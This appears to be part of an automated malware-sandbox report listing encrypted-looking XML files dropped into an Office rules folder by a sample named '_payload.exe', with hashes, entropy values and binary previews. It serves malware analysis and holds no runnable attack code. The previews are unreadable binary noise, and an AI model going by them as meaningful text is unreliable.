                                                                                                      Preview:<?xml..URD........*jCw...Qz.g.b.r..$"o....X.j@tLQ...!.9..J....K.N6.^...>H...g.O...34.]H...O...7.jw...R.^I.....^....GT/.NQSt.<..\b....l....s[?k3.H`.........2.}......x._.{...@F.9.)l..m....DW..... .....~.UK?!k&...8OkA..S..~.Y..yoo}?....d.N&K.5#.d;....]G.b[..H$...x.....}.*.....O...-...^W.e.Z......... .&L@`.z...h.....*qt<;t..!Wd.N..XZ..OG9..=.(...C..K.q......%.T...|k<.r.OI..u...$l......{q.qC........O.Ca0..p.gw....#&.p..F.:....P..|.....}..... ...J..l..v..G.3{.S....R...q.Y...{y..j..x.BS...o....z...../..x....$.o..R..$=.}......Z...Q..Qt.oY.?R..V...>......$g@:.4........ #V...z........;vM*...3..E..K...j' .S.?A..P_........5..........cl.....E.lV..:k.i..x.....+....z....+{@......8.W.6%..|BE........./..|.?.....a$...&\.!..".@8zS=xr.................!...........j.....L....J.V.0P(An.`..a]......w.@..3.I.8(.v..-3..UGlAAt..#..5...^..<.`.....F.o...'....S.4.K....%.._.".6Nn.0....H._y.P...C....X.<..$.c..u..D.Z-.Ry_.$tC...I..;.q.bz....$s......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702851v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1738
                                                                                                      Entropy (8bit):7.8766392601374635
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Pr4V9IAT6+B8UvmvTJcN5daXgBlB8B7wD:PnAT6u8UvmvyBa8lX
                                                                                                      MD5:891EC73F0D80DDAD4523CE655C3FF370
                                                                                                      SHA1:4E6E73269850F98F30A738E5864EF67CC914559E
                                                                                                      SHA-256:DD598A03848A9449B1DA9323B4BEB40101AAECFE92F8BF1EBE9F62DE6C3FD843
                                                                                                      SHA-512:3872803B98F88FD6DEFD28B3C7C6926BAD61F0E04BE2F4F1263CAAB3372E56127C0648196480057895F9AA58DD431E31E4EF47F34FAEF261D606B90037D6A08B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...?.,0...YXP...f;L....VU..Z.e.I[8..k.|58O<N......".q{:. ......$..4.1K.E.....s....N.'.bE.,&....?.|.[.&......1oOQK.;F.../..q7.....V..B;a.^L@..gr.7..S....fWj`....^.CC..@..b.bV6.)...a,JeK..;.0..R.../...)...J..j..cj.d.GlMb....+.+..f..r."i.4,..s.jq.}6.{u.........<6..wS...\$.F......!..W..RN..cK@h.94si`f...i.%A........0......u..^..$..<..J..}f..........$j7 .1..F+/.h..'....yq.;'...bH.X.L......=i._.]...K..r..{I....4.0.IE-.@....$..q.$*.J...']|:+..mJ.p.A.x#N..+J..i>&+3..H..D%IWNoL..i..e..S.m...%..B..V..V`..x..r.+...y...!K&..vb....p.......(..N.BC...{...]mI.n..... q.C.....Kn.#F.K$.Z...i.r/|ac...`.h.....:....._.....IB..+....K.si4...2pP......8~....N)...;..BY..j+g...N=.8..Hd...Q......7A....k....~.9......b...(W..j....y..@.}....8!.`....o.=.......k....|.S..r..}...e..1x.g.W4..U/&W.........p.z.W^{.....6....+.yU.S-.%...f........!;Pt.....u._\..C..)....K.m..]......h.&..7....H.....U2....\k..P.j<vs}s............vec4....kNa......K..^"=.!1..$.M.v..t!..`_.x.........

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702900v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1707
                                                                                                      Entropy (8bit):7.88188791854889
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:VCHSD+h+YHYqVDwcySDMzS+IA1ccwiiQSiwxUwD:VCTYY3VbDSIAyc2Q5U
                                                                                                      MD5:E088E73AB2DB54971C0247623C119005
                                                                                                      SHA1:4436E486E685A7FBC1E6F37E1AD35FEB91BE23C3
                                                                                                      SHA-256:D1528B622A0B7670F46311764A3B057D73AE986C6AF2F8EA8CDB9AAA50EBBCA5
                                                                                                      SHA-512:C96F1B12259297D24760A0679F2FCCD8A62A29AB5E72FD38EFC83A4FD62E0427DE3C40256AF8B4A53B5F8DC0AED8B66DD24BC1BD5599EB58395A85FCB44375CF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...c.`Z.9:...x.\.w....x......&.i.u.M$....j.Cf..y1h....p.+.j.N..x8.1..kJ.........ozd.N=.7W.^.. >n.,+,..?$.....q....1...:..H.M;{.!..1)....a.xN....J.Z[F.]v._V..R.=......?.y.z.h\..H...b8..M..%..N@.X`.9......2..d0.j....Z....b.^...e._.^...FGs.)..u-..........V..[....Ks[..@.......=9..R....D..W].-y.n...X.VHlL\C....G....]......)......b.!.l)...'...8'.v..^..p......n<(....y..`Lr...)......d.......N_..y..D.....q.+^...oq^.;[Y`.ZP....8..@qy..m./.V/r....D....F.....V&H.........Q.F$......"n..x....VF......j..K7....h...dg=.;n..n...}97c`jE3F...9.bz.&..#A.I?.+5*._z......X...../......Y5..[.....!_x.......'h......r"...I......!.......C..I.H...?.s.....$t. ...r....+yca.....~.....16H.[I...!...gZ.d.x2zQ...MTgKD">...h..'E1.....?O...a.1./.W?#y.4.X..L..X4w1...\.2.....mfdL.%......i....lZ$.#.B...F!....XX+'....x:.N..uq....S....>...=.........$UA..b5sQ.G...[<J.w..ze...]{g.Q.#.#.m(....KN.....,..<....t..m....Q.5....,.3.Y*s...bm=.....4b..~.....S$T..{.'3..\................f..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702901v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1744
                                                                                                      Entropy (8bit):7.899684333754788
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:rSjpXEWoomMDHKQXD8mhecJh5uQWHj8fqSUgV2lcCqyoowD:rSjpvouK0D8m0cJG/j8fDbV9Lx
                                                                                                      MD5:762899CAFBDDA2104AA12CB0D236F29C
                                                                                                      SHA1:A1062A2AC69B4F791A93F78CC594CB4B900025AC
                                                                                                      SHA-256:3057468F213E4571C2C6D49E83BC6EDDA9667144B9D22A98D790B2DED0C8364B
                                                                                                      SHA-512:4F3BEB71154767298D7BCD817ED3C3574721DE2C68944E50BD2A1C9548BCAE95D54DCD5EF50AC57BA8C892623AC67E57208B889EC2C79480645961D17964D14D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlf0........I.-.#.J.......QL].....<...t..Rs....ul.x...[^.G...9..N......wTD$..u\.U....,..+/..\p. ...sY.4A..(.c.(Pg.k9.............W.K-<.y..Y........e.Y/ .)..[Ci..H.....u..Q.*.......O.....eBV..W......?...e;t...r..P=...[E..f.<..(..7.g.F.:..].7..._M".x.&s.z.........Kwm...2;L">.M...}.b..A8...#bX..X.3.A.W.UY.A.h...m....H<a.K...,,~x..ID%.u..........'..Iu.j.......Imz.%K.}.y..o...(a.jE..U.....F:.(4.+.......-.H....v.O..Z....{.}!.PQ...u.d.X...)......y..v.>.O..S>.G...(...w.n..l.;t.-W.....,.h}U.}Ma\.;.l.m...S....1.....\.....~..iM.:......{.....Q\...g..o#..E.jj...$.}.oeR..{r.b.d.iF.8.............S.0.N(.:...:'v.;.h.m..gn......<A.@GW.B@...E.k.A.a.3..&L~.l..`....aX.B.e\.......n..qs..7..>.P...fD!".........e...%.Dz..~k4.......s.R+.....w.z.p\..A.Z...iY.|.....5q;/Bd,k.$..{.s2.L...XQM...H...d.T.G.R;.q.......CM.....6.O....K.x).1tw.6....M...^...}.Fh.Om.*.+.K=...,.\..]..j.;..2.f....d?#........~....'.(......J........}.\y@.'...Y&.....m;...}..p....9]..U.w..&

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702950v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1701
                                                                                                      Entropy (8bit):7.880775553700248
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:B4ckjKYpLAwsiatzzFK8KvxeRFm256CqbGAdnWZ8zLQ4lDeO815g8531e+qqv6bD:almYmw4tffZ56CZA24LQeqO+zo+qqwD
                                                                                                      MD5:6DF34CD832DF88B81F75935A5FFD605C
                                                                                                      SHA1:73821C5A9A01EA119A57B42ED7C70E37C346C057
                                                                                                      SHA-256:9EF88BB0A36D0EC854321F11937FE5C7A8FA3561EE772F741A24DDE9AD26AA9A
                                                                                                      SHA-512:244639BA9F3C6B524E1AE898AD732CE579C838197DE26E3FBDB06066E44F0FE0E06344134753EA7F1124BACCB53CE68FCBCC5D51EE8C9EC187103997098314A4
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...F.....V....!..(.XL..,~..S....d..Bow.8...m...tXp.C3_~.y.......b&..i..n..o.sH.6X.N.n."w!.p..=........E..1..\5iP>V[......(.C@L+.:.(.&..i.ftR*._{:*%.L.e....%~!,..V..<L.K..<...]RM..=....rn.......V..X..7.v..<...}.5.0.`..g........d.a._....."....h`?...^.d..,.......cF .dB.(C.....n..;R....M.!..>H...Y.....i..''....'k..;.N.r=j&.....$..#.F@.C.K...d...;..k...H0..{..U?.3..Q......_n...5..&.W...;.<-.~_........T..6...q........7......X..5`....`9...o.0.....rz.?_.._....c.V.........0.@..[-Y,.i....!.....q|.NB...{v*.w....-.Z.n..:).W..-t..w.xQV....zD.4}..'f.z.1.....)U.R.,...K;...6).`....x>y....c.o...]......U....S_`.zP{|^...S.2v.$....t0..G8.....2.J...z......~..........m7<.K5Y...L....rL...8....p.....FyAn2........o.o..-......+.}..$z.qs.6..u.m.........\.....L,..+>..sb.%O....^}.un'...>..cH... zo...wD...z.T....5.;.#....W.A..AMA..&_x......so4.i..K.5....:c1........g.7.|.."...E..):.l..B.I.....X..`.*x.>-..Wyl.,^.?......M.0....=q.7.S.$3.o.- ........L%.D.....41.l.&`bl

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702951v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1738
                                                                                                      Entropy (8bit):7.874832683045629
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:0quWEynGITXpPE/luon0nTFF0/W6E9mHdU45RwD:09yGEPE/l9w8fc
                                                                                                      MD5:B101D1C1874A3199B65FAD2DD821E45C
                                                                                                      SHA1:570F27F81E13254F3959CEB989B294AFDA68F7F5
                                                                                                      SHA-256:FA2468AEF9AB23497678E67E726DA542BE4D34933B2F54A25743B1273D5551DF
                                                                                                      SHA-512:8E2307506829A3CB33D2224CEB15BE3ED328BE7521E99C785A7C4B28944D321B9AF4885F5D3C9097ACF2FDB951B191F917FDE88FABD9A9D051D5ED3A932C9F3F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlV<.J...v5.B..k...n...`g..&W.'m.NT]R...j$..Y..p~\`..9..x...W-.\..G.z.x?.Y....}.j2]3.9..)...?PzZ..~.}.........].......u.l..wjf...uP!.....D..s..a..e....e^62..Qr.)....h.....K9_..g.;.o..z@..a.x.....jz.B..K.G.%G..&....,.i}......$..*E..f.D..j|q_..S?%..^....|3=.[.c.^..I....KY{o.?-["].[....*O.G.Gd.G..Q..1kDDO}u2..a...c].[...........T\H.S-.J.#.....L....+...f...|,...<...K....x..I. 5&P....v..O'...uS.5..... ..vZ..Y(*..x..9......j0....l.......^...'..;.a.4U....r......`b|..."..'.....;..G.....E...4.l4....L.....{..W.g._..s......k.a...*.XGJ..b..s,.`.(..x.v..)./.,.D..p......z..Y.._.^.%..E..#...../$.;...N..k...S.vq..*`d..'....$}....'.M.*.Md.1......5n...N)/.R&...S.<.....@....N.,..J....l..,...N9*..%...&..~....Mw.7.1.>?.|.f]fV.......]Z.o.>..L3.'P..._....uww..nL.|...}.:......|.......k..Y..*...B.<m..)\.?..g..Np...$v...]...g.Y.[..........Y..@G.....$^"M..1.Jj2.w...0..)I..Y`..y..rW.+.o..\...w..^a:..2...f...Sn........!...f..\#.~..T......X.*`.a-.6V..X

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703000v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1702
                                                                                                      Entropy (8bit):7.877166540768162
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:zXeqaPK4O0PN9LUofiF3KSgROadRdwXNLwD:zOqydVhVGaxRR4O
                                                                                                      MD5:3150BB8B6141C0DCF4DE5F27C151F835
                                                                                                      SHA1:FBDBF77345B207AE6E49C5E73CFCCC342C2ABCF7
                                                                                                      SHA-256:8B82A84BD7E9B2DD65CCF18D37A99BA2B4AB8973363732497CFFFAF5EBF9519A
                                                                                                      SHA-512:168400A7346AA5D67E01983B16699F28E0B81B9499D1DBC4CE69BC0ED91D693426F632A08695F84D2804A8AD6584326BAD4496AC2158758018640559F166F9E0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.e\<.....x.....!+.B..i.W;3...3...VS[n_.n...y..:..bGC..u|..........K.Zt......I.$7_......M..<k.]y}.PU.....Q..h.zh-.;D3...:.C.D..7.OAo.).+.H......\....E...NBj....cK...1.i..g........}..t.u.8M..$......$\..Yyj.L"....`.B..x.L.(p.x.C}x&.no.c..&V...[ch.....h.&.\8......m.:..#..e.)_...q...}..%.'8.7..Xw....u-....zi1|.j..q........Rd}...v.....(a8.p..#.bb....c|..`...Ag.4:.....g.c..q...9.`#b/..z.[h......s.<.V\.....<.6"h8...D.\..e.5.E..r.K`7....-.XEk{..........].h.....IS.....?Fc7Z.....A.x."i.................6.@...h.W.w.... .>}..W$jP.......G-......i..m.2..B.<.X.f..2..u.-..a..fv..&.......K.x8..%.s.c.nq.5N.1.8Q....[%...*F].}A?...2s...9aS.oE..S.YA1i....vv..+..}ue..gE.%.&N.G......O.5........l...n...u"]W. s~.u..!......4<.......J.9.MOV......E....>]].3#.=.;"",.......F.......3.lH.4. .Oe]+..T1'.V..<.....X@.}..q...........a9.F%nk.2+...N.T...... .cB.z.9"W.......I..).v.&Wb..,.B......%...>...$/...3........L....|.S.x.[..j..7A.~........#...].....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703001v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1739
                                                                                                      Entropy (8bit):7.88523005886289
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:srd5oHXsW07mkGys8n9ZArLC0gBVjGjl1mJYwPDGA8+wD:srd5oHr07cysSZAruDX6qGA0
                                                                                                      MD5:0D4B7883750CA0AFF1F2864823F5503B
                                                                                                      SHA1:804DB1B2316DE2EDB8AA86D184E3C8478D620A75
                                                                                                      SHA-256:DAAD5838B6CB34395CA75D7D1E1779C82B6ECFD3888311B8D10C6A8271BDF97C
                                                                                                      SHA-512:D59FD16F6BBD90A93CEB8351095F51241603110CCAC181ADE9BBC22A98B7AD105456675DD544DE570764299F77BA0AE6CD856591F63CED52203451642E26B6AA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...~.no..JpNg...G....4i.sj.....8..",;&.|.X_..I2.no.....kM..5.S..E..=.C..A..$.-\...y2?.Bg...z.^..u.pc.F.....#..F:jE... ...]....S.....i..zX..Q.aj..S..w..i...Mt..D..s..wAq...a..}...W...X..i....7.7fN.5BW,.."..nj.kL..J....9w.../.K.........M...g.W+v.c.C.{..rP."./x.....Z^..f...%....o..S+=ja...R .|...Z}.(.L.......|..29..$....l..*$...(x8u.FA+.:.L.2..n.L.....q-).R.6..^..9.............9...${X)^J.]6R....._m..... z.W...Y).V..<.4*.j...O+....3Y..;..S......y......v.-g..F..%...P.......'&.i.......>....\bl..WO..$......^..zRJB).m..P.X.WaS....r..k.:........4.l..c..........u"......oH.W...r4V...I......A.[)..*..O+..._...``....3Z...RI.....;.....B...QR.X...!...&.>c.$.... B..w3..=a....A.K.M.....>LM.|....?..~...........<B.B...l.....62..F.HFA.7..!....B.Z...'.....!.=O..W2..J..]..W.IQ].pA.0.9......$&M.........M.F.......9.<."...2!)..].w..o.....%jt.......0.n..1..U....Z...N..1....3T;...../..g.t.N-.`....U....%.....2..e....0..=.GPT.1.m/....,Ak...."..;....s.w...^.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703050v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1724
                                                                                                      Entropy (8bit):7.877394208667654
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+UPhmAGl2MCxM8qbgejTTSsjcpFa6FIeehJ9I1CHSfYYAmKvLRAyN8BRwxVXbCBi:paliGncpjIewK1Cyw3mKvLecuexUBBwD
                                                                                                      MD5:BDA5920A5A5E50172ED216A4F9FFFE99
                                                                                                      SHA1:024CC110836F83383BFEFCC02C6F6DA233850B73
                                                                                                      SHA-256:525E6B33B05760AA654B027EFFAC7B8332CEC02B48E9493DC7F6852EDF281250
                                                                                                      SHA-512:016B856879598319F7930DD00BAF1DC4CE4B73648DA4AA51F0EA649105AAA45943F955A801259977E33213A73DF91C2BBDB86C7E59712BB23B28CC0BD60A943C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.3.&.:.........+..M.^M}O.)...._..k%..[..|.T....w.....&?._U...4......g.....+H.`Z0.v/.j..k<...-.6.@......EJ..q...T..Q.c.5'.0lm..h..j=.+w....A9qD.._:...8A........<..2...k.h.u..}l...\.&.'.n,.&*......}.]..X.o.<..T.4....d3.^^..SL...d.....x.....\-i0...L.._Z.....6.g....UBL..[1/.w.$.aN*=.U.l.`;.;f....+...QT_....|]..;"...............jX.C.8...........~9.....pV..0..Ob?..7.p)..*,.eP...'h...}..W.....@.'.\...R.7..D..<..2...U.2.....sk..Q.jd.0.].c.J.wJ............B.X.D...:>Qz...xt...-..$..,B...H. _...HlO.....amy.g...;.....+..j..Y....c..1.A.....d.-.x.....(...._.a.....n.5.....\.iB..}E.|t.f.K7.D..O.5..F.k&....`1......D.|&..w.D.+3$!.E.&!.d*..^....[.8!...e..p4.!...[........q.%X..`:.....[I.V..>..Q".^....../...ul..e!7.S.+.w...jCG....F...O..|{{.i...9....N<.5.8.,.~6FS2.d......T.1..=.YC...[..=..h.......@..gY.|..cY....9.w;...o..I;.....Z.z......bQ!+......x..I...(.>./.e...B...D....T.....Y9.....v_..7h7..K.b."Wl...|M.Ep.........u.......N5....._..-.L#..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703051v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1761
                                                                                                      Entropy (8bit):7.883452565004047
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mR7nJoBTAjTtgp/hsEZXHnO04A914EobEIcJYxmndk0JQmF+PpO9CHmPuD8OKvBW:mR7njepZtXSA9yENIkg49OgK8PnwD
                                                                                                      MD5:24C200BB5A6C65030CD78A2AEAA043CB
                                                                                                      SHA1:7FDA8F59A055BFCA6494082BA8B2698636AEA374
                                                                                                      SHA-256:0321A5C62E69F38F00AB92D9EA11B955D5954A2A768A675B08ABA0A445E8D9A3
                                                                                                      SHA-512:AFAC0099757A902C26815CAA3BCCF33A576D1A0E44EF673D1E0062DD8CD0860E573C52DF1E3E6D95F6A95F612980B56B857AC124620AF3E8F0E2CC0474899D63
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlw..s.G...p3..ci..d....?ik.....,..6#..^....rv..?...CUG.IP"..Z...2.F.....Du...P(.U.9E...uI...6UM..Nv.d.....6k...6.M."z.x$."..}.<2.^.."U?1@...E.o.....<r.T.k.....@.?.....d.N(./Xb...i.P...B.-..koU..uk.+f0....A...o.Ag..'.....c;B...n.....3.v...,$...hS..mE..%VJ._V...0...A.l.c....%d...(.5.#...Y,...w.YD8......_.1..z..O..1.}<KB.....q..x. ...^....|.w&.<...q......O..Q.Q.2.|..F~.d<...A....V./}.q...{.....U~...6....b.R3.=X.,~...j...=..t.k......&...^....k...6..(.F.......R.eT..R....._H.......8((....?X...&u..9=.&.K."._.O3.,p......9..VMB...........Wb~...h1.......N)!.).P.5..7....!..2.'g.`..(...p..P.X,..dSiG............).=....o;...a......Oux..C.J..3.6Qs........O...q.B...Y.."J<...%`ws...!.7.W(.z.f...2$.03..5q..".j....9..q.8...]CX...\..`...wW..........DH...r....1&...X...h..-...i.......pn.|2.o.....V...K.}.....5..mwQ....E..$.<......,.n$=.?.'.D..7.?..1%............C....a..X;sU.p2o.l........?s3....n=a....C.vJ..".L$y...J..7..wQ....l..d...by..._;ul....h._.@...IB<

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703100v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1689
                                                                                                      Entropy (8bit):7.880840156219425
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:pyDF547ukYM9fR+jqyWNatK5/KoaB2PziwkLwD:cH49aoaB2bh
                                                                                                      MD5:57800DCF66F54745F8F458004CD9ED62
                                                                                                      SHA1:7868131A37D5033DE95034C268BFAB3D7D321907
                                                                                                      SHA-256:3686A4F8F5BDB42A185C76A97C9BEE1B4D5EA4DCE66638EECEF256EE8AEE78F5
                                                                                                      SHA-512:5A4BDBA4E0A8E7CA87BAE555DC17F3C1F896DED9115B976E5B8F0419A2EF06F2782E7B5011DCA1F8DC0D4A22241C42D7AB2C27BCB2AD1AFBFD5F2A5517B0E915
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.H.. )T..7.S.u?l.Fa].dQ@..t.....XO.m..Ok...YOy..qf...p..m.W..|.....prE,9w~..Z...a[1..g.~.E~l}....d|.W...Y.r..'..`.S.......^..l..2IV.b.[....V..PP0.&.......L...i.;...UB.i.ojk....p.^.K.Y..5..k.....tI..,Jn}OSx(^..43S....1w;.....N#...0f..f1.,+..lM/f..~.c..@.O.<;.m.|...D".~.~...T(e<...a...:.PX....^..-.4.l..a.#..N........t.>&.............{.9.a......(u....8.{..^.m.F....*.j......bG..P..c)..f]..;..R......VEk._?.......'N... .s...Z..'.*O..D5.8......,. .497...qB....m@~..X.8{W........&.gh..:H...f.....r[.K.J>..)FT..8...St....].D0....&...-,yg...smOZ'.f..%..X.R..!Q.d&U_.j(5.:...."..\..........1.L.|.7...g....M.VW;ud...G.....n......"...D!....." h..-.9k...9...i.........~...#...F.7.Y.@b./5.W....Ob6..ff....W.)f._D._....6..N.g.c>....,\"._....E..,......Iv.BN$.-v.[.4...;<...5...U.....D...f...&.....`l+5.....e...6.*..p....u.P..B.d.5|..%..^.....O....9f..e..*.C.C.3Hx..|.7F....&P...N...>h.gxw!..".\.;~.F..Cp~:...-.g..05W..m...z.X...M...y9..4Z....... ....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703101v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1726
                                                                                                      Entropy (8bit):7.875271760309901
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:nZyCi6O+ahKn+x/FEzUuvF7TvvtcvkQ89wD:nZyCjahKAtU77bvOkQ8u
                                                                                                      MD5:29CF827CCB20CAAE78CFA7D05CE6262A
                                                                                                      SHA1:77B7C26C9B21432EEB5E176B311FE8C394192117
                                                                                                      SHA-256:A00F5BE8781992EEAE8959FF439AAB3711676F5DB788C6779F7A39915F7619DE
                                                                                                      SHA-512:D76EAC1ADD4C70487CB739CA66616B88ABAD755E086C5EC02EE0D1351E9FA965CF6132C3F3FCF0E33EBDDA82FB5DA397482565D3CE44D72696F349A72E85F739
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlcp..*.+..m.7.b..r..[![..U...J.T[..*.XM{Fh.a.....^.~...G..G.V.X..HZ..A..;.1.M4g...s)f..u..EOw.'?..@.u.=9.C-..C.N)8....^(.-6......J....q.Z...>..........G...."~UgL<..C:..}VZ5.v..i.B.N.q:..-&S[.l..Xa...C..|. .......V....>....|jID..kjB......r....n|d7.q.[.!.....Tl~.\x..-x.T..:..'..q...R.........i.4.......,.__.W..=H..@.8.....c )p1....W.D....._......(.p.*..C0..r...@.%@Q.5.`...Z..v."}.{I8.P1.=.......M.<u..Z....1..I'....z!.?.Rz...{U......f..20CY.V...)._.#T5|....W...V.e........&..B....W...12.~....H.d..<.d}.u...6 ..]..?HI..k.A..9vA#....(...B.G....4.<N?X..]!G.......]q..M..U]..P8H.*G.!.h...XD..|z..'.I....W/........JG.\M6.Qk)jc .%..t.q>.Z\.......C}d.3r......%.F....G.F.....T|qE.....\.m...J_....+.......{...v.s......O.J..m...2...mW.{&....9.;..i.9.l.&.$..U..j.....).?..r..'.1..gm...c.h...(MH/?......9L..D.../<.$...}...b.k...~.c.]/r........R.[]....j;..Q~.'..W...Sn.I.R.u.H..g.!..!C.~..B.e.X..b..........4.7.w..6l#......7...p.v...d...'..j.H...@L....vy....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703150v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1707
                                                                                                      Entropy (8bit):7.908927956818213
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:ocSAh0z87Musos/R07evlc2NiFrxr8WwD:v5h0o7MusoQqK9cqixxrA
                                                                                                      MD5:1E1FE05E65EE57F43F6AA5787863F073
                                                                                                      SHA1:02D1256192A205F8FA1BA529BFA2BC07487B0973
                                                                                                      SHA-256:3C23EB39BEDC77BC2D2273A13A22440A2F6F39BC278FFE444B70B579C8215F5F
                                                                                                      SHA-512:BFCC09E67891B81AD76E15C3FB222B90224622A8E1E766553C1C096993D541270C5AF31DB8A5B58FDC9CAD1DD8A0FCD367BB5EC88D98864201C7125F9C2CC82A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....F.......se.....1.x...u..9..*F...b......N.........a.{.......Q~zV....zp.dc.6..........".6...v..j..1....J1c+b.3Nzf`].3..%..M2..SV.|>.rI82T..P.]....5~.?1...l....X5.d.x.&......%.Q.u...W=..$L..Qk.p..7.}?P...H...)... ...@...:J......`..u.qH..:.Q]....a...N.xbi._O/|..jN1...Qw..'*..,]...........Z..Q.f.O..@(...2.e....#._M5...5Zc......}......m._.......O..h..fb%.}E..>.V.H...h...B.........N........0a..!yn.|....;.......,B..{).5..m.....7#."aD6.o..z...Ie.U...;,.<.......Grr.0..'.'!.Lt28.b......sdS...G...|.-.YW....<.N.........x.Yn.r9.."NH..?E.S..*....Q...m...L.....2...>...}........K..P|......5n..&r_.k..C..F4........>....TN{..M.>.ft.u..`q.*.9.............^AP...T..TAa..{K._.B.*.v0.....jh..X.....w.w$...q.'Dr../...l..G9$....3\M........H..o..r%TF.._cV./!?.l.9..q....U.4d.Q.5N..N.....~WG.......g/s...<..B4.b.E..5H...y....t.;.`I(...Mt.3{W).@E.G.U.C. .(x..,;.6.%...l...WRj.U#^.".o..h).0.c...~.....^`.F......@....B.O/+....t..r.^......m..!.y.y...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703151v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1744
                                                                                                      Entropy (8bit):7.899262054787952
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:9v9v+4zfV0A3iji+KZ6n61xnl+nEN+hDwD:/tp3yBklco
